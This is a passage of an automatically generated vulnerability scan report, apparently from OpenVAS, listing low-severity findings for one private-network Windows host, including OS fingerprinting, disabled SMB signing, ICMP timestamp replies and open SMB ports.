Summary This script performs ICMP based OS ngerprinting (as described by O r Arkin and Fyodor Yarochkin in Phrack 57). It can be used to determine remote operating system version.
Vulnerability Detection Result ICMP based OS fingerprint results: (100% confidence) Microsoft Windows
Log Method Details:OS fingerprinting OID:1.3.6.1.4.1.25623.1.0.102002 Version used: $Revision: 1739 $
References Other:
URL:http://www.phrack.org/issues.html?issue=57&id=7#article
Log (CVSS: 0.0) NVT: Traceroute
Summary A traceroute from the scanning server to the target system was conducted. This traceroute is provided primarily for informational value only. In the vast majority of cases, it does not represent a vulnerability. However, if the displayed traceroute contains any private addresses that should not have been publicly visible, then you have an issue you need to correct.
Vulnerability Detection Result Here is the route from 192.168.0.191 to 192.168.0.6: 192.168.0.191 192.168.0.6 . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . .
Solution Block unwanted packets from escaping your network.
Log Method Details:Traceroute OID:1.3.6.1.4.1.25623.1.0.51662 Version used: $Revision: 975 $
Log (CVSS: 0.0) NVT: Microsoft SMB Signing Disabled
Summary Checking for SMB signing is disabled. The script logs in via smb, checks the SMB Negotiate Protocol response to con rm SMB signing is disabled.
Vulnerability Detection Result SMB signing is disabled on this host
Log Method Details:Microsoft SMB Signing Disabled OID:1.3.6.1.4.1.25623.1.0.802726 Version used: $Revision: 12 $
[ return to 192.168.0.6 ]
2.1.4 Log general/icmp
Log (CVSS: 0.0) NVT: ICMP Timestamp Detection
Summary The remote host responded to an ICMP timestamp request. The Timestamp Reply is an ICMP message which replies to a Timestamp message. It consists of the originating timestamp sent by the sender of the Timestamp as well as a receive timestamp and a transmit timestamp. This information could theoretically be used to exploit weak time-based random number generators in other services.
Vulnerability Detection Result Vulnerability was detected according to the Vulnerability Detection Method.
Log Method Details:ICMP Timestamp Detection OID:1.3.6.1.4.1.25623.1.0.103190 . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . Version used: $Revision: 13 $
References CVE: CVE-1999-0524 Other:
URL:http://www.ietf.org/rfc/rfc0792.txt
[ return to 192.168.0.6 ]
2.1.5 Log general/SMBClient
Log (CVSS: 0.0) NVT: SMB Test
Summary Test remote host SMB Functions
Vulnerability Detection Result OS Version = WINDOWS 5.1 Domain = WORKGROUP SMB Serverversion = WINDOWS 2000 LAN MANAGER
Log Method Details:SMB Test OID:1.3.6.1.4.1.25623.1.0.90011 Version used: $Revision: 16 $
[ return to 192.168.0.6 ]
2.1.6 Log general/CPE-T
Log (CVSS: 0.0) NVT: CPE Inventory
Summary This routine uses information collected by other routines about CPE identities (http://cpe.mitre.org/) of operating systems, services and applications detected during the scan.
Vulnerability Detection Result 192.168.0.6|cpe:/o:microsoft:windows
Log Method Details:CPE Inventory . . . continues on next page . . .
2 RESULTS PER HOST
. . . continued from previous page . . . OID:1.3.6.1.4.1.25623.1.0.810002 Version used: $Revision: 314 $
[ return to 192.168.0.6 ]
2.1.7 Log 139/tcp
Log (CVSS: 0.0) NVT: SMB on port 445
Summary This script detects wether port 445 and 139 are open and if thet are running SMB servers.
Vulnerability Detection Result An SMB server is running on this port
Log Method Details:SMB on port 445 OID:1.3.6.1.4.1.25623.1.0.11011 Version used: $Revision: 41 $
[ return to 192.168.0.6 ]
This le was automatically generated.
top related